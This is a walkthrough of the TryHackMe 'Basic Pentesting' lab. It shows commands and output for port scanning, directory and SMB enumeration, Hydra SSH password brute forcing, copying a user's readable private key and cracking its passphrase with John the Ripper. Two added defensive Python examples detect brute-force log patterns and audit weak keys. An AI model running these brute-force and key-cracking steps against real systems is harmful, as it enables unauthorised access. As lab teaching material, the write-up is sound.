Basic Pentesting Room
Overview
Basic Pentesting is a TryHackMe room designed to introduce the following: brute forcing, hash cracking, service enumeration and Linux enumeration.
Begin by Running an Nmap Scan
First we find what services are running on the machine using nmap.
root@ip-10-10-175-193:~# nmap -sT -T5 10.10.65.91
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-04 14:40 BST
Nmap scan report for ip-10-10-65-91.eu-west-1.compute.internal (10.10.65.91)
Host is up (0.0067s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy
MAC Address: 02:FC:39:AB:D5:D1 (Unknown)
Gobuster
The flag is stated to be in a hidden directory on the web server. Port 8080 appears to be a Tomcat management page, so we begin by running a gobuster directory scan against the HTTP service on port 80 to find hidden directories.
root@ip-10-10-175-193:~# gobuster dir -u 10.10.65.91 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.65.91
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/development (Status: 301) [Size: 316] [--> http://10.10.65.91/development/]
/index.html (Status: 200) [Size: 158]
/server-status (Status: 403) [Size: 276]
Progress: 4655 / 4656 (99.98%)
===============================================================
Finished
===============================================================
From this we can see that the hidden directory is /development. Inside this directory there are 2 files, one of which states that the user J has a weak password. This may be useful later.
Enum4linux SMB
Next we run an enumeration scan against the SMB service on port 445. This produces a long output containing the names of users gathered from the enumeration.
root@ip-10-10-175-193:~# enum4linux -a 10.10.65.91
WARNING: polenum.py is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jul 4 14:46:28 2025
==========================
| Target Information |
==========================
Target ........... 10.10.65.91
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...
...
...
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-22-1-1002 Unix User\ubuntu (Local User)
Hydra
After finding out which username J refers to, and knowing that it has a weak password, we can now begin to brute force SSH using hydra.
root@ip-10-10-175-193:~# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.65.91 -t 4 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-04 14:51:21
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.65.91:22/
[22][ssh] host: 10.10.65.91 login: jan password: a*****o
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-07-04 14:51:38
Using the username and password we can now connect to the server using ssh.
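As an added example that is not part of this write-up: a run like the one above leaves a burst of "Failed password for jan" entries from one source address in the target's /var/log/auth.log, followed by an "Accepted password" from the same address once the wordlist hits. The detector below flags both patterns on constructed sshd log lines (the hostname is made up; the addresses are the attacking and target boxes from this room, used as sample values).

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of what sshd writes to auth.log during a run like the one above.
SAMPLE_LOG = """\
Jul  4 14:51:21 basic2 sshd[1201]: Failed password for jan from 10.10.175.193 port 40110 ssh2
Jul  4 14:51:21 basic2 sshd[1203]: Failed password for jan from 10.10.175.193 port 40112 ssh2
Jul  4 14:51:22 basic2 sshd[1205]: Failed password for jan from 10.10.175.193 port 40114 ssh2
Jul  4 14:51:23 basic2 sshd[1207]: Failed password for jan from 10.10.175.193 port 40116 ssh2
Jul  4 14:51:25 basic2 sshd[1209]: Failed password for jan from 10.10.175.193 port 40118 ssh2
Jul  4 14:51:38 basic2 sshd[1301]: Accepted password for jan from 10.10.175.193 port 40250 ssh2
Jul  4 15:02:10 basic2 sshd[1402]: Failed password for kay from 10.10.0.7 port 51000 ssh2
Jul  4 15:10:00 basic2 sshd[1410]: Accepted publickey for kay from 10.10.0.7 port 51020 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse(line, year=2025):
    """Return (timestamp, 'Failed'|'Accepted', user, ip), or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"), m["result"], m["user"], m["ip"]

def detect(log_text, threshold=5, window_s=60):
    """Alerts as (ip, kind, user): 'burst' once an IP reaches threshold failures
    within window_s seconds, 'success_after_burst' when that IP then logs in."""
    failures = defaultdict(list)   # ip -> timestamps of recent failed attempts
    burst_ips, alerts = set(), []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, ip = rec
        if result == "Failed":
            recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_s]
            recent.append(ts)
            failures[ip] = recent
            if len(recent) >= threshold and ip not in burst_ips:
                burst_ips.add(ip)
                alerts.append((ip, "burst", user))
        elif ip in burst_ips:
            alerts.append((ip, "success_after_burst", user))
    return alerts
```

Run against the sample it reports the burst from 10.10.175.193 and the successful login that follows it, while kay's single failure and key-based login from another address raise nothing.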
Priv Esc Enumeration
After gaining access to the server I began attempting to find privilege escalation vulnerabilities. Below are some of the things I tried.
- Searching for SUID binaries
- Checking sudo capabilities
- Looking for insecure permissions on other users' files
- Alternatively, I could have used linpeas.sh to automate the process
After looking through other users' files I found that kay's private SSH key had insecure permissions, allowing anyone to read it.
I then used scp to download it to my host and will attempt to use it to gain access to her account, which has more permissions than jan's account.
$ id kay
uid=1000(kay) gid=1000(kay) groups=1000(kay),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
$ id jan
uid=1001(jan) gid=1001(jan) groups=1001(jan)
Cracking the Protected Key File
After downloading the RSA key we can see that it is password protected. Luckily we can use John the Ripper to crack it; however, first we need to convert the file into a format john understands. To do this we run ssh2john, followed by john against the output file it produces.
root@ip-10-10-175-193:~# /opt/john/ssh2john.py id_rsa > john_id_rsa
root@ip-10-10-175-193:~# john john_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
b*****x (id_rsa)
We can now log in to kay's account using the private key.
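As an added example, not from the write-up: john's output above shows why the passphrase fell in seconds. The key is in the legacy PEM format (Cost 1 = 0 means MD5/AES, Cost 2 = 1 means a single KDF iteration), and its file mode let another user read it in the first place. The script below audits the private keys under /home for both weaknesses; the key texts it carries are constructed headers for testing rather than keys from the room, and the ssh-keygen options it recommends re-encrypt an existing key in the OpenSSH format with bcrypt rounds.

```python
import base64, stat, struct
from pathlib import Path

def _ssh_string(blob, off):          # one length-prefixed string from an openssh-key-v1 blob
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n

def classify_key(text):
    """Return 'legacy-md5', 'openssh-bcrypt', 'unencrypted' or 'not-a-key'."""
    lines = text.strip().splitlines()
    if not lines or not lines[0].startswith("-----BEGIN ") or "PRIVATE KEY-----" not in lines[0]:
        return "not-a-key"
    if "OPENSSH" in lines[0]:
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(b"openssh-key-v1\0"):
            return "not-a-key"
        cipher, off = _ssh_string(blob, 15)      # 15 = len(magic incl. NUL)
        kdf, _ = _ssh_string(blob, off)          # "bcrypt" when a passphrase is set
        return "unencrypted" if cipher == b"none" else "openssh-" + kdf.decode()
    if "Proc-Type: 4,ENCRYPTED" in text and "DEK-Info:" in text:
        return "legacy-md5"   # PEM scheme: one MD5 round over passphrase+salt (john's cost 0 / 1 above)
    return "unencrypted"

def findings_for(kind, mode):
    """Findings for a key of the given kind and permission bits; empty means fine."""
    out = []
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        out.append(f"mode {oct(mode)} is readable by other users; expected 0o600")
    if kind == "legacy-md5":
        out.append("legacy PEM passphrase KDF; re-encrypt with: ssh-keygen -p -o -a 100 -f <key>")
    elif kind == "unencrypted":
        out.append("no passphrase")
    return out

def audit_key(path):
    p = Path(path)
    return findings_for(classify_key(p.read_text(errors="replace")), stat.S_IMODE(p.stat().st_mode))

def audit_home_dirs(root="/home"):
    """Map each private key under <root>/*/.ssh/ to its findings; clean keys are omitted."""
    keys = (k for k in Path(root).glob("*/.ssh/id_*") if k.is_file() and k.suffix != ".pub")
    return {str(k): f for k in keys if (f := audit_key(k))}

def fake_openssh_key(cipher=b"aes256-ctr", kdf=b"bcrypt"):
    """Constructed openssh-key-v1 header (magic, cipher and kdf names only) for testing."""
    blob = b"openssh-key-v1\0" + b"".join(struct.pack(">I", len(s)) + s for s in (cipher, kdf))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{base64.b64encode(blob).decode()}\n-----END OPENSSH PRIVATE KEY-----\n"

# Constructed legacy PEM header as older ssh-keygen writes it for a passphrase-protected key; body is dummy.
LEGACY_SAMPLE = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                 "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\nZmFrZSBib2R5\n"
                 "-----END RSA PRIVATE KEY-----\n")
```

Running audit_home_dirs() as root on the room's box would list kay's id_rsa with both the mode and the legacy-KDF finding; a key already in the OpenSSH format with mode 0600 produces no findings.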
Getting the Final Password
After logging into kay's account we can simply list the directory and see a pass.bak file which we now have access to. Below is the output from that file.
$ cat pass.bak
heresar******************************************olicy$$